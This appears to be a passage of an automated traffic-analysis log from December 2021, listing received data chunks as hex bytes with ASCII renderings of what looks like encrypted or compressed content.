                                                                                              2021-12-13 23:57:13 UTC3059INData Raw: ff 37 84 f9 28 ba 83 98 c4 64 11 c7 0f 7b 4a f9 26 eb fb da 84 50 bb 01 c7 c9 48 56 dc 68 9d 3d fd 69 43 0d 43 e0 f9 6f c7 a2 db b1 6d 26 8e a3 a7 92 d7 4c 55 15 b7 28 45 10 6a eb 50 06 25 38 b1 54 63 ef ac 8f 36 9f e7 3f 92 9a b1 57 b4 63 8b 79 0c 4f 03 47 4c 57 50 49 f0 90 24 5b 02 03 ae 9b a1 e1 15 31 e4 32 58 b8 74 fc 11 5c e2 3c 35 f1 99 22 5e b5 cc 39 ca 88 c5 e5 2a de 17 d0 24 2d a3 66 b9 49 c5 dc 70 2c d7 7f ce c6 d5 9c 71 ab ad 64 fa 85 58 10 d0 95 0c a9 80 14 26 6c 92 a0 65 9e 78 88 d9 17 2c 81 da 55 fd 95 d2 19 97 bd 85 7e 9e fc 58 07 34 32 01 a1 aa 96 ae 31 66 e4 b3 84 f8 fc 4b 1b fa e6 3f d1 ef c6 d4 6e c7 d5 0c 78 85 fe 59 09 25 6a 9f a3 84 01 5f b1 1c 02 0d 65 4d fb b8 b7 e5 d1 7d d5 e3 3c 48 dc da 3d 6a 1d e8 e7 8d e1 94 4c 36 01 35 75 1d
                                                                                              Data Ascii: 7(d{J&PHVh=iCCom&LU(EjP%8Tc6?WcyOGLWPI$[12Xt\<5"^9*$-fIp,qdX&lex,U~X421fK?nxY%j_eM}<H=jL65u
                                                                                              2021-12-13 23:57:13 UTC3075INData Raw: 34 e3 15 c5 df 9e 6c f2 2d 34 bf 2e 88 64 e3 5e 86 e2 e2 77 a5 39 38 dc f7 d6 72 d1 f7 63 1e 3a 60 ed 6c e6 fb 53 5b 77 20 92 35 77 ab 86 ae da 39 bf 31 9b 08 35 6c 38 eb f3 4d fa ac 59 da ca 91 dc d5 fb 81 c9 66 33 43 44 23 27 8e 8a 03 6d 75 90 89 ad 82 3e af 8e 75 0d 49 43 cd 04 4d 43 48 06 52 20 ca 45 04 8c fb 93 f7 5d 95 37 70 e7 64 8c 7d 3e 96 40 d8 b1 81 5e 54 9f b5 57 95 8e 5a 52 c8 48 41 f8 a8 4e a8 d8 b2 93 1d c3 d3 68 7a a5 dc 3c 35 d3 df 9a 6e 44 bc 46 a0 94 86 1c 26 1b 3f ac bf f6 cd 5b d6 01 2a 6c e4 36 ea c3 6d 19 a5 08 9e 32 bb d1 b3 2b 87 91 35 10 1c 1c 88 c9 3a 69 41 ec a9 fb c3 22 03 2f 33 92 6a 6e cc 1c a9 b7 19 4b 45 18 9c 2e 20 a9 50 98 ae 55 cc 9c b8 a7 d8 00 f7 61 6f 25 3e e1 05 52 54 cd d6 68 ee cd 87 13 02 e6 76 7f af 84 86 f4 b0
                                                                                              Data Ascii: 4l-4.d^w98rc:`lS[w 5w915l8MYf3CD#'mu>uICMCHR E]7pd}>@^TWZRHANhz<5nDF&?[*l6m2+5:iA"/3jnKE. PUao%>RThv
                                                                                              2021-12-13 23:57:13 UTC3076INData Raw: 7f 21 e3 a7 5b fd 50 8a 47 51 9f 78 ad 6d d1 8a 1f 64 3c 09 e4 cf 22 85 8b ea 7e ce d8 a1 b0 46 8a a0 e3 5a da c8 48 ea bb 2f db 40 fc 0e a4 33 ca 3c 59 c3 dd 6b 12 c2 72 c2 8e 32 b0 35 31 61 6e f6 40 86 21 76 5d 40 80 ed 25 ea e1 65 aa bd 99 fc 77 cd 13 b2 3e ca 96 85 9e 9d 96 50 d8 67 61 dc ac d7 0f 1a 97 0d f6 ee 3e 7d d4 38 ef f5 c0 73 83 5b c6 d6 2b cc 45 a9 72 3a 0f 5e 6c 72 17 cf 4a f3 79 5d 05 91 1b c4 fd a3 a4 30 0c 8b 1d 63 e1 fb 6a 8f 8c d7 46 7f fa be ee 60 19 e5 3e 95 f8 d3 a4 e1 f0 3b 9f 6a de 08 3f 4b 77 ed 75 7f 77 37 75 80 d0 29 4a c5 cf d6 2b c8 ad 61 20 f6 f5 c6 28 f8 74 24 7d 49 df a7 32 ff 09 2e ec ba 7e bb d5 c0 d8 d2 9c 35 e1 79 1f d5 9d 84 96 ae e5 73 58 98 9a b4 66 dd c6 a2 3e 23 48 c0 e2 ec e4 9c 5e 85 96 d1 12 15 fe 75 a3 c3 d2
                                                                                              Data Ascii: ![PGQxmd<"~FZH/@3<Ykr251an@!v]@%ew>Pga>}8s[+Er:^lrJy]0cjF`>;j?Kwuw7u)J+a (t$}I2.~5ysXf>#H^u
                                                                                              2021-12-13 23:57:13 UTC3092INData Raw: 94 96 a8 4c 37 9e 6b c2 1b ee a6 db 92 d6 4e c7 34 f8 f1 ab 0e 98 f5 36 91 5c 45 b2 1c c3 9a 9e e2 a5 38 76 2d 51 f1 5d e5 3f ab 34 d6 31 7e 49 ba 55 4c b8 54 4d 21 83 1a 12 18 f2 8e 9a 74 1d ff ec 66 2a 6a 46 d9 b4 5e 8f 4a 0a 92 4f d4 dd ed 6c bc 2e 93 50 69 73 51 87 c2 c2 af e3 f0 ba e7 73 7e f1 cd d8 f7 1c 0f 8c 3b ab c2 54 c0 d4 f9 01 8d 04 17 ab 2d de f3 d5 a2 40 c7 a6 8a 40 95 71 e0 38 e9 e9 55 2a c9 04 0b 47 13 04 28 48 7d b0 20 7e 7b 2b d8 24 06 78 2c 7c 7a 1a 8c d4 27 d1 8e db 1a 2a c8 40 07 a5 12 5e d5 43 1f 5b d0 41 ad ba 46 bc f7 d7 0f 20 18 58 3e 7f 0c e6 1c 26 25 37 d4 74 94 15 e7 7c c7 2e b0 fe 3c 71 db e5 64 5b ac be 5a fb eb 45 4d 00 83 60 c7 88 a9 9a 1c a8 0b 62 38 60 43 75 df ad 30 0a 1e 33 87 bc 9d dd af 4f ce 78 b6 ab 7a 96 16 da db
                                                                                              Data Ascii: L7kN46\E8v-Q]?41~IULTM!tf*jF^JOl.PisQs~;T-@@q8U*G(H} ~{+$x,|z'*@^C[AF X>&%7t|.<qd[ZEM`b8`Cu03Oxz
                                                                                              2021-12-13 23:57:13 UTC3093INData Raw: bc 6c 22 92 b6 8c 76 b7 92 00 73 90 e3 17 b1 93 d1 e9 2b 38 8e 3d 43 d7 ad 48 61 96 7b 9b 59 34 ac 54 53 28 5c 41 1a 1d eb 59 53 80 a1 b7 c2 73 1e 08 94 85 6a 20 a5 0c d6 91 e4 28 2d f9 16 f6 7a 43 ed 73 3a d7 95 5b 53 07 79 66 aa 72 bd d3 9d 0f eb 87 1e 72 1e 61 06 36 cf b3 7c 22 c4 9e 5e 66 c6 30 49 1d 84 db ca af fe ad 45 98 70 d0 3d 36 39 08 d4 2c 49 da e8 bf c5 2c 1a 24 c6 3b ec 17 93 9d 08 a6 7c c7 f2 90 8c 13 c4 40 c1 ed da af 94 93 a5 2d b2 d8 ca ce 6c 84 e1 f0 3a 49 2c b7 2b 17 9b 0b 17 8b c4 ba cd 97 2c 34 a8 10 19 75 04 05 d4 a0 de 9c 91 ed 2c db 2b 68 e1 5b 06 30 39 f7 be b2 50 5c 3e f7 7a c1 39 d0 05 c8 72 b5 3e 2b 28 87 31 90 e3 a0 ec 32 d2 f7 d5 d2 89 60 1d 4e 36 a8 c8 d2 fb fb 2b 4e c5 07 47 b2 83 01 f9 c0 a4 8f e0 c7 ea 36 4a 4a 64 08 39
                                                                                              Data Ascii: l"vs+8=CHa{Y4TS(\AYSsj (-zCs:[Syfrra6|"^f0IEp=69,I,$;|@-l:I,+,4u,+h[09P\>z9r>+(12`N6+NG6JJd9
                                                                                              2021-12-13 23:57:13 UTC3109INData Raw: 45 52 1d e7 67 78 c7 d5 3e 51 ff 6d 73 b8 96 7e 1f ba cc 2f de 22 12 2b 92 26 84 54 89 50 7f 5b ee ee 4f 10 ae 8c 58 c5 b0 d9 48 5c 33 e2 13 d4 8d 43 5e 04 02 a0 cc b4 d7 5b 56 fa 61 7d dc ec 2a 2d ae 37 22 0e 94 e0 77 8e 6d 0c 93 56 f0 2e 19 b7 6e 34 37 6f 3b c1 a1 a1 ee 53 9e 39 c0 d5 21 aa 5b 87 ad d4 6a b1 47 39 8b 65 c8 ca db 0a 1b d3 a2 21 d9 28 3b 16 f1 e7 9c 24 f1 cc 9e d2 6e 4e d5 fc 0a 4f b2 a4 9a 04 af 7d 71 9c f2 2d 9d fe 77 98 f0 6f e6 0f 13 06 3d 32 8e 3a 99 00 c5 21 6b 2a 7f 65 e4 97 cb 40 6a c8 4c 1d 1a 06 c5 13 3b ec cd ed 59 a9 1c 63 35 28 0b 9d 0d f1 c4 5b e0 e5 72 f6 82 fc f0 f1 79 bc f0 f8 bd 9d 36 27 06 1f 2c 52 be 64 c9 14 4d fb 8b 56 68 8f 1e 54 b8 7c d3 c3 dc f7 72 21 a3 72 84 6d 4e 72 1c 60 b7 7d 5d 33 2a 14 0c e4 8d b7 a4 51 68
                                                                                              Data Ascii: ERgx>Qms~/"+&TP[OXH\3C^[Va}*-7"wmV.n47o;S9![jG9e!(;$nNO}q-wo=2:!k*e@jL;Yc5([ry6',RdMVhT|r!rmNr`}]3*Qh
                                                                                              2021-12-13 23:57:13 UTC3110INData Raw: cc 7b 63 a0 3a 3a e2 9a 98 46 96 7b 0a 4e 65 c8 de 43 e9 b4 5d 56 5d 71 ba bf 8d a3 eb b0 60 2d 59 ed 35 96 c4 05 3e 90 60 4c 5f dd 36 88 42 33 a8 89 d1 65 bd d3 19 85 5e 02 1c e2 90 48 7d c3 cf 93 fe 1e 07 8e b5 93 e6 f0 2c 04 38 0b d1 9d 4b fd 0b 91 e2 18 3f 3e 00 cd 1e f3 6c ba c8 76 d8 e8 a6 33 cb 88 c6 33 fc 9a 8a ed a1 7f d6 44 20 b6 27 54 c9 fd d9 4f 16 08 9e 6f 1d c0 c2 5e b9 6a 5d 48 53 67 08 ab e6 8c da 86 d6 d9 47 6c 9d 8f a3 40 4b 99 d0 77 9b aa f7 32 0a 35 55 8f 11 56 e4 67 cf 4a 46 ae f3 27 5f 6c ac 69 09 2d 0a 19 1c b0 7f 0e 79 f5 c6 73 58 17 a4 62 0d 67 9b 82 be 0c 2d de d7 12 a1 18 35 8e 23 c0 14 f4 bb f5 ce 01 e7 04 ae 7f f3 0f ed b7 03 38 8d 71 96 d1 80 f8 a2 e2 e9 bc 3e 32 34 7f 9f e0 7c 15 8b a8 1e 3f ac c5 22 94 70 e8 a1 d1 93 da 76
                                                                                              Data Ascii: {c::F{NeC]V]q`-Y5>`L_6B3e^H},8K?>lv33D 'TOo^j]HSgGl@Kw25UVgJF'_li-ysXbg-5#8q>24|?"pv
                                                                                              2021-12-13 23:57:13 UTC3126INData Raw: be f7 e9 b4 38 47 d8 06 b8 1c bc 27 b5 84 8c 40 92 46 0f aa d0 e7 7e 5d a4 eb 32 35 b6 6a 1c a7 67 8e 9f 01 3f 89 52 07 03 00 a0 77 df bf 0f c3 d5 18 5f 9d 2f 06 34 a9 f9 4b 61 8c 22 da 89 f6 ea 4f 37 1d ec f1 24 50 4c b6 b2 ec dc 98 4d ed 38 d3 69 f1 40 ce 8e 8f e4 d3 92 22 fe 7a 47 c4 a4 fb 6a 31 f2 fd 1c 44 36 60 df 7d cd de ef 74 88 86 cd 9c cf 28 42 00 b8 c4 89 94 79 7f 36 1e a1 7c 8a 83 2f ec 3e 34 57 7f 50 07 51 11 8f f2 64 81 e2 a8 ff 84 c3 21 8f 02 b4 61 20 e0 08 a8 d2 d6 a3 d8 ef 44 f9 79 4a a5 a8 a4 5b 16 65 ba 6c e7 46 3b d6 77 d1 e9 19 4c b7 7d c5 c5 66 10 d6 e1 d0 73 2a 5b 67 cc 00 b2 9b d7 da ad 7d e6 f3 cb 31 ee 4a 50 83 1f 6c 20 a6 69 5a c1 08 c4 44 bd dc f0 a7 67 18 5b b3 e4 aa 5b f3 a1 cb 6b 7a 7c 4c f3 91 c2 b0 f7 dc 0e 13 f6 5e d3 40
                                                                                              Data Ascii: 8G'@F~]25jg?Rw_/4Ka"O7$PLM8i@"zGj1D6`}t(By6|/>4WPQd!a DyJ[elF;wL}fs*[g}1JPl iZDg[[kz|L^@
                                                                                              2021-12-13 23:57:13 UTC3127INData Raw: 6b 48 8d a1 81 66 af 72 49 14 35 33 ff e5 5f c6 c7 6e bd c2 f6 c0 d8 e4 08 a7 ca 98 17 e4 55 c1 5d 27 4a 7f 05 8f 8c 8b 70 7d 9d d4 06 a8 f0 1c 8c 4f c4 36 c3 49 fd 53 9e 38 f3 13 72 bf 00 0a f8 01 ae 56 21 d3 32 32 29 d0 06 d0 c7 5e 94 60 be 66 0c 67 38 aa db 97 4a d8 00 9b b7 1f 69 0b b5 d9 01 4a 15 80 72 84 0a ad 99 28 c5 7f 3f c2 5a db b4 eb f1 49 ef 38 d3 88 fc 21 c4 65 26 36 bf 1e 7d 4c af 67 6c 1b 52 9d fb a9 43 fe 94 49 90 60 be 72 f0 10 2f e8 db 21 ed ce bb e7 1a 60 55 79 47 87 a8 78 e4 62 99 ab 91 da e8 5f 8d 31 ae e4 90 3f 61 cb 57 85 9a 75 7b 29 d6 d3 c5 a0 16 df 31 fa d7 72 11 be 8d 97 d4 05 bc 5a 06 64 95 00 a3 b2 bb 44 e9 34 74 79 2b f2 ee 05 b9 f9 f5 5d 18 bb 87 21 85 bc a2 62 ba 43 60 77 98 ef 85 ed 3a 1f 07 45 42 04 58 a2 2e ac 18 21 d6
                                                                                              Data Ascii: kHfrI53_nU]'Jp}O6IS8rV!22)^`fg8JiJr(?ZI8!e&6}LglRCI`r/!`UyGxb_1?aWu{)1rZdD4ty+]!bC`w:EBX.!
                                                                                              2021-12-13 23:57:13 UTC3143INData Raw: c3 53 14 ab 3b d3 90 fb ac 9f 17 7f 6f 3a c4 1a 1a fc 68 86 1c ab a9 33 9e 4d d2 50 05 60 40 f5 39 f5 e0 23 c6 a7 a0 1d a7 9d 44 6d 2c b1 f2 f1 ea 2c e5 8f 57 8b 86 07 c8 43 cc 8e 48 49 84 0a 7e d0 17 0a 48 96 f5 b5 67 09 76 dd b8 75 a1 ab 14 fa cf 82 5b 70 08 e4 32 94 03 9f 89 31 f4 8b 9c b6 39 11 ff 1c da f0 72 c1 ee 39 f8 db 3e e8 cf 6b c4 9f 8f 5b cd 9e a0 9d 1b 61 c1 2a 48 bd 04 60 f8 10 1a 0c db 05 a0 d5 85 f3 9a f6 0e 12 e0 b2 34 ec 91 56 55 4e 71 fb 9d ef 66 31 43 27 50 db d1 38 a2 0b 66 27 60 e9 70 67 0d 81 49 1f ed 5a f7 bf 81 6f 75 cc 59 0e ec 19 31 f8 d3 1f f7 73 7c 5f 5f 15 59 5c c3 36 20 0c 7c 21 f5 ad 41 ae fa ea 54 eb 2b 0a 2b 16 a3 cd 52 09 d5 af 97 34 5e 0f 51 3e 5a 1f 4f 0b 4a 0b 95 8c fa 12 59 72 31 16 9e 69 61 1c e6 96 a9 a3 6b d6 9a
                                                                                              Data Ascii: S;o:h3MP`@9#Dm,,WCHI~Hgvu[p219r9>k[a*H`4VUNqf1C'P8f'`pgIZouY1s|__Y\6 |!AT++R4^Q>ZOJYr1iak
                                                                                              2021-12-13 23:57:13 UTC3144INData Raw: fd 04 a3 43 ae 36 ce 88 56 15 86 3d 12 b2 1e 23 5f e4 96 8b aa c7 f4 9c 7f 53 a8 0f 85 9e fe b7 ed 0c 4a 41 58 90 82 bc e0 b4 89 30 86 b9 e2 cb 4a de d6 ec b8 9c 44 11 bc 80 10 fe f2 4e 5e 65 bb 27 ac 10 f5 91 aa 49 30 7e 8d c1 79 c3 7f 21 d9 e0 8c a0 ef 1f 9e c6 4e c0 d4 e6 bf 3a 7e ab 03 a6 a2 7b ba 63 b4 5f 33 34 28 75 e8 6c a6 0c d6 d2 0d 46 a0 30 1f b5 35 92 52 99 a0 eb 90 68 9a f8 9e 7b c8 7b a7 1d 45 d9 b9 b3 d6 6e 12 dc 21 64 d7 5d 60 b2 75 24 45 e6 c2 7c ad ed 88 a4 c3 b8 52 32 86 11 75 3c 13 f7 78 71 0c 3c 07 0b 94 44 59 1c e0 40 1a 8a 4b 54 0a 50 9b 5c bd df c9 0d 5c 62 82 de 8d 83 da 2a ee ce c3 d7 98 62 22 ec fd 0e 29 43 c8 6b cb e4 0e d3 d4 6d ae 02 69 92 fe e0 37 6a 5a 2a e7 ae cd 18 4e bf f0 23 e4 9e 9a 62 9d 76 02 f8 8e 86 85 12 0d 21 bd
                                                                                              Data Ascii: C6V=#_SJAX0JDN^e'I0~y!N:~{c_34(ulF05Rh{{En!d]`u$E|R2u<xq<DY@KTP\\b*b")Ckmi7jZ*N#bv!
                                                                                              2021-12-13 23:57:13 UTC3160INData Raw: 28 c5 9e 39 8e e1 5a 18 d0 c5 ba a8 b8 96 ae 89 4e 4f 52 b7 1e 37 e1 ec 92 e3 64 88 e0 c3 30 82 c3 cd 54 43 65 76 14 f7 1c f3 64 d5 bc 19 8c 1f b9 fc c2 b6 f8 09 9c 4b c4 dd d7 da af 6b 84 fd cd 5c 89 5e fc 04 a6 e8 8c 4e df 36 2c 68 e7 e0 46 80 8a 30 49 93 cd 20 2d 98 ab ed 12 63 1d 38 24 40 bf 4f e3 bf 5f 77 42 fc 66 a1 18 2d 26 e1 14 dd a0 77 1b 5a f2 51 89 de 4b c0 9d 39 df 7d ad a4 f0 ce 7a 11 33 1c 71 16 ad 87 12 67 b7 7f 6a b3 30 e1 ac fc 34 b7 14 4a e9 d9 91 c3 73 d6 46 6c 0e 32 d4 e3 94 a7 b9 ab 07 59 c5 f4 b6 aa 2b 93 91 98 19 51 c0 24 8d ab 5a 99 c9 bb a0 cf 81 c2 1f 62 34 b1 ac 62 e2 4e 41 2d 16 44 de b3 ef 1a 86 b4 f9 da d2 5e 51 b6 91 77 5f 48 35 80 f5 d6 ed e8 f4 4d 37 2e 61 55 8d d0 4e d8 f0 3a 5c 63 f7 19 e9 8e e5 3f bb 50 02 49 df bf 46
                                                                                              Data Ascii: (9ZNOR7d0TCevdKk\^N6,hF0I -c8$@O_wBf-&wZQK9}z3qgj04JsFl2Y+Q$Zb4bNA-D^Qw_H5M7.aUN:\c?PIF
                                                                                              2021-12-13 23:57:13 UTC3161INData Raw: b6 23 62 a6 4d c6 9f 7e 17 39 b7 5f 31 f8 df 38 27 7c e7 2a da 2c c7 ef 83 9d 6e 87 24 a1 92 74 9a 44 e6 9f 61 c0 d8 cc 1b 1e 87 31 af 9a d6 d8 c7 a5 51 52 0b 66 a1 5e 42 06 6d 89 0b 1f 87 71 4e 23 15 25 33 7c 03 da df 73 03 9e 3a 0f a0 02 8e 95 2e ee 7d 3b bf 75 1e de 57 b4 da b3 dd 6c ca 93 f2 ad 4b 9e a8 fc e0 51 bf a1 f8 73 0e 9f 50 2c f1 0c 63 fb 99 2a 14 15 50 39 02 1a 7f 35 7c 47 49 75 07 f2 fb 55 3c 0e 54 bb 20 a5 bd 1c d1 c2 4a c2 ea 61 5a 6d 4d 11 d2 48 5a 0d ba c3 0b 0a f2 03 e8 15 15 47 8d f9 e6 cc 3c 7c c0 aa 40 e4 08 91 14 6e e9 10 47 2d b9 02 86 93 90 b4 59 98 31 50 80 3f c5 0b 12 17 70 d8 70 96 f5 4d 96 8b c7 03 b6 31 73 ef b5 a8 d7 43 f9 bf 80 4a 6e 0a 9f 11 7e 37 5c 4d 10 82 9e fd 79 66 ac 85 7e 70 8e 75 c8 94 32 ff b8 fe 66 32 9f 39 e6
                                                                                              Data Ascii: #bM~9_18'|*,n$tDa1QRf^BmqN#%3|s:.};uWlKQsP,c*P95|GIuU<T JaZmMHZG<|@nG-Y1P?ppM1sCJn~7\Myf~pu2f29
                                                                                              2021-12-13 23:57:13 UTC3177INData Raw: 7d ef 11 7e 9c 45 97 4a fa 1c 05 6c 77 a1 61 c8 c5 a1 4d 4d 3f 57 f3 fe 50 79 5b 6f 14 14 2f c5 77 d8 53 ec d9 80 f8 db ea 35 48 79 28 ff 28 93 d8 20 77 fa 2c db 9f 56 ee 92 7c 21 a2 78 8c f6 43 14 07 65 51 a3 6a cc 5a f5 b9 cf 1c d1 08 d8 4b fa bb e8 21 1e 46 68 a5 74 c9 03 8d 71 88 e2 c3 2b af 54 b5 b2 ab 3b 3e 46 45 a0 4d de 30 f7 c6 b7 fa a4 67 c3 1a 1a f0 0d 02 9e 6f 16 dd 83 88 a9 f6 45 7f db b0 23 72 29 87 96 f9 1a 85 a0 70 55 67 72 a5 d2 6b 71 2d b6 ad 97 f0 16 a7 91 8a 5b e9 90 b7 98 1e 00 91 a6 82 ca 73 5d 64 07 20 c9 86 51 ec ab 8e a0 b1 03 9a e6 f6 3a de 7a 27 70 f5 67 13 07 6f 72 9e 4e e7 a3 5c 46 6d 60 be 5f a1 1c e5 83 5e 09 4c 2a e9 d7 60 2e a4 ca 12 23 72 50 b4 4c c6 a7 15 df 3c 88 ea 2c 0f 41 a1 ae 4b 50 b2 8b 9d 63 14 9b 8d c2 f3 e4 ff
                                                                                              Data Ascii: }~EJlwaMM?WPy[o/wS5Hy(( w,V|!xCeQjZK!Fhtq+T;>FEM0goE#r)pUgrkq-[s]d Q:z'pgorN\Fm`_^L*`.#rPL<,AKPc
                                                                                              2021-12-13 23:57:13 UTC3178INData Raw: e8 08 15 ce a5 43 5c 59 c8 03 18 0f c3 77 e5 78 95 e5 51 0d 89 ed 30 03 c7 a3 0c 5b 9a 79 3e c1 8b 22 b1 ff d0 e5 2f 3f 7f 1a e5 66 13 9a 11 af 23 92 24 d0 78 1e e5 87 c4 55 76 2e 59 d0 a0 b3 c3 b9 6f 51 79 b1 e5 f4 d0 2c 27 1f a2 d5 bf 6d b7 7c c6 c0 b8 69 77 24 6f 84 66 ae 3f 09 98 cd 71 0e c0 b6 c2 5b c2 f9 30 02 86 58 72 b2 5b b4 4e 98 29 ee 6f 05 3d 25 9c e8 e7 67 62 fd 5a b6 d1 ab d0 d8 54 09 25 61 e9 7a 2a e9 7c c4 f2 74 1d 9a ae f1 25 5c b4 b2 cb ca f7 e9 33 16 55 79 f9 e7 e5 b6 ec d6 e7 98 60 8c 5d 3a b6 a1 73 06 75 1c 96 25 2d 13 6a 48 45 05 77 15 62 aa af 4a e0 25 e0 3e d8 f6 2c 57 d7 aa 90 52 52 97 86 c2 9b f1 64 34 3d e6 39 72 21 35 58 21 ab 14 1f 1f 88 6b 66 77 22 56 3a 8b b7 6a 88 b0 ec 96 d7 94 29 8d a0 d4 d1 01 81 e9 92 f1 6f 84 33 a0 c7
                                                                                              Data Ascii: C\YwxQ0[y>"/?f#$xUv.YoQy,'m|iw$of?q[0Xr[N)o=%gbZT%az*|t%\3Uy`]:su%-jHEwbJ%>,WRRd4=9r!5X!kfw"V:j)o3
                                                                                              2021-12-13 23:57:13 UTC3194INData Raw: 62 d5 0d 39 18 20 ba f5 ef 8c 77 1c 50 98 b5 3a 35 84 12 5a 8e 2b d3 19 7c 30 f3 58 24 e4 a8 1e 01 ae d4 65 d8 1f 7c 8d b5 23 17 33 7c 86 58 82 02 3a 81 6d 36 1d c0 63 ce aa bd 04 16 19 5c 82 b0 ba b0 72 c6 b3 eb 57 c9 45 dd df 05 ae 5e 2d 06 a0 57 f3 9f ee 95 1b ea ee 36 d8 85 57 02 d3 97 ef e3 a5 e8 29 96 05 23 3f 09 1a c1 7e 78 52 92 0a f2 cb b8 92 39 d0 54 30 e1 a2 9d dd 15 8a bd 07 c0 7a ee a8 5d d2 71 f9 2b 39 72 ed 5e 7d 79 15 79 33 6d 22 41 9b 4e 72 20 bd 12 f0 fb dd c1 6c 2b c2 92 17 e2 d2 c7 c6 9f c9 9a d7 e1 87 1e c1 8c 7c cc f7 d3 c4 cf 7c b8 7a 18 9c 85 24 9c 72 03 85 e5 4c 0e 75 f0 0d e1 d4 64 37 4d 3b e5 6f d3 5b b4 90 64 34 0a 07 c4 15 7f 0c dd 9f f3 99 a6 c0 cf 2c df 0a c6 6c 61 8b b7 1f 1f 14 94 ab bd 9b ef 0a 52 c0 b1 0a ae f4 85 94 a3
                                                                                              Data Ascii: b9 wP:5Z+|0X$e|#3|X:m6c\rWE^-W6W)#?~xR9T0z]q+9r^}yy3m"ANr l+||z$rLud7M;o[d4,laR
                                                                                              2021-12-13 23:57:13 UTC3195INData Raw: 4c 97 6a cb 30 ab a4 cf 86 01 60 5b f3 bc f4 23 d9 5b 95 78 fa 6d 3a b9 60 1b 90 63 04 c8 f7 14 f4 bf 79 8d 71 38 91 8e b6 6b c3 f5 8a de 8a 69 0d 7e 59 60 70 c7 a1 ef d9 57 f3 d0 47 f7 9b b9 f6 48 be eb b9 69 9b fe 93 6b 08 ca 3c d0 81 6f ec e8 78 be f1 e3 b7 a3 3a df 33 d9 27 d6 59 90 34 2b cd 37 73 c8 3a 5e cf 13 05 83 2f 09 9b 34 40 95 db 86 3d d6 cd 80 9c 28 bf 01 b2 11 5c 68 5a 1e 50 46 7f 87 0e 9c c7 c8 76 64 49 5c a4 3b 04 b8 4b 64 ff 5b d3 18 35 ab 63 43 85 6a ec ec b6 df 85 1e cf 81 86 18 eb ff da b5 5a ef f4 9d ee de ea d0 22 01 72 a1 a8 8b 5b ed e7 13 e3 f4 50 12 ac d8 37 3e 28 99 c8 e7 3d 56 2b 69 9b 9d b3 26 1e ef 1b b3 fa 8b 6d bc 98 0c 35 c9 f2 32 63 0b d2 f0 d3 cb 50 c0 3a 2e 6d 53 41 25 1e ec 58 89 6a 92 38 50 63 aa f4 75 25 a1 f7 7d 61
                                                                                              Data Ascii: Lj0`[#[xm:`cyq8ki~Y`pWGHik<ox:3'Y4+7s:^/4@=(\hZPFvdI\;Kd[5cCjZ"r[P7>(=V+i&m52cP:.mSA%Xj8Pcu%}a
                                                                                              2021-12-13 23:57:13 UTC3211INData Raw: d6 a1 dd 79 f4 31 1c e9 07 a6 49 95 5a 27 d4 24 62 01 23 1a 06 ca 1e 7d 16 14 b6 f9 db 2b 86 4e c8 fc 7e 7f 6c 2e 17 d0 45 be f1 ac 8a 4f 4b 90 53 e0 ab f4 83 52 10 db 64 28 43 a5 cc c6 af 7b 8f ff c5 05 25 e3 76 e6 76 d5 29 5a d7 c4 32 6d b8 22 b2 cf bc b8 0c 07 2a 69 2c 8c 06 5f e2 82 57 c7 1f 95 df 93 a2 1c 3f 02 09 58 26 48 07 33 9f 46 07 57 46 38 64 e4 05 e9 45 e5 f2 f0 aa a8 fc 12 6f 97 16 26 d5 82 6a 86 96 31 ca 97 ef f1 8e bb 50 f8 8a 02 25 92 70 47 96 af fe b9 f6 35 c5 a4 ae f1 69 50 d8 23 cc 6d b4 51 80 b8 7e 19 7e bd 32 39 bf 4c 82 76 52 94 04 0e 47 93 7a 91 f2 a2 aa f5 3b 7e de 20 d8 11 63 a6 2a ac ea 3f a1 86 1f 90 06 70 8f 24 f4 a2 d6 5b 9a 01 19 65 6e 1b b2 4c b1 5c ba d9 4a b6 dc 5d 62 4b 96 6f 4b c6 c8 e2 31 04 9f 97 e5 b9 d9 11 79 e6 76
                                                                                              Data Ascii: y1IZ'$b#}+N~l.EOKSRd(C{%vv)Z2m"*i,_W?X&H3FWF8dEo&j1P%pG5iP#mQ~~29LvRGz;~ c*?p$[enL\J]bKoK1yv
                                                                                              2021-12-13 23:57:13 UTC3212INData Raw: 96 07 27 83 37 71 f9 53 09 1b a3 c9 df 65 fd 85 2a dc 17 11 1e 3f 35 02 5d 05 cb 7e de d1 c1 37 35 8e e5 68 7a 08 32 09 9e 07 02 35 3e 57 17 bb aa 3d 0a b6 74 2b d7 1b 48 31 4b 64 37 47 3e 81 e2 07 94 62 4f 31 1b d8 06 7b d9 a9 9a 0e 70 d0 37 41 7d 9b 16 bd de 57 d5 67 64 6d 6c 86 2c 53 ee 5c dc ae d0 dc 61 27 5a f7 2e d0 c5 cb c7 07 57 46 28 4a 36 4e 8a 0a 60 59 33 05 18 08 71 a8 07 c9 dd e0 d5 eb 4a 5f ad 83 0e b2 84 79 08 c1 fe 15 5f 42 5c 81 cc d0 2c 3b 58 65 8b 50 2c b7 47 81 7c 84 b0 c1 9b e4 46 3a 39 32 72 8c 5a 12 78 2b 43 fd 6c e8 6c ac 67 2d 0e e4 4c 93 b8 04 ae 14 83 0b e4 24 08 6a c2 d9 e7 d7 20 5b d9 4d fe 09 aa 3a 8c 69 cf e6 cb c6 c0 cd 64 9b 8c d7 af 95 15 bf 1b 3d b2 f9 a9 6f d1 0c d4 ac ac 2b 75 54 08 d9 fb 05 d8 0e d8 ae 32 fc c4 b3 ad
                                                                                              Data Ascii: '7qSe*?5]~75hz25>W=t+H1Kd7G>bO1{p7A}Wgdml,S\a'Z.WF(J6N`Y3qJ_y_B\,;XeP,G|F:92rZx+Cllg-L$j [M:id=o+uT2
                                                                                              2021-12-13 23:57:13 UTC3228INData Raw: 51 d0 f4 2a b5 05 eb 8c 38 d5 d2 e5 7d ef 46 42 e2 28 ae 00 76 50 40 0d 0e ce 5b 7c 4b ac 3d 32 5a c8 c0 fa 79 46 0a 7a b0 54 2f 49 43 4f a8 bc 21 a6 76 d5 e2 d5 c6 72 96 19 0d 67 aa 7e 10 9a 81 9d 76 63 61 41 a7 72 7a e8 24 c5 d5 b9 83 9f dc fe fe 59 f4 0d c9 1c 92 4d e3 f9 59 4b 3b 88 84 eb 00 4a 97 f0 99 3f c5 57 08 90 dc 48 20 5f 4e 4a 5c 8c 80 d9 70 0c c0 e7 a3 84 02 67 bf 06 5a 5d 53 f3 79 bd 70 a1 41 3e cd e9 eb 8a a6 32 a9 f4 64 4c 41 4f cd 89 c2 7b 30 8d cc de b5 10 d6 f6 a1 41 ac a5 c4 1d b8 9c e8 67 19 0c 84 6c 2c f8 52 d3 2b 14 2d 87 2e af 77 9d 4a 11 b8 26 69 a1 8a 58 48 ed 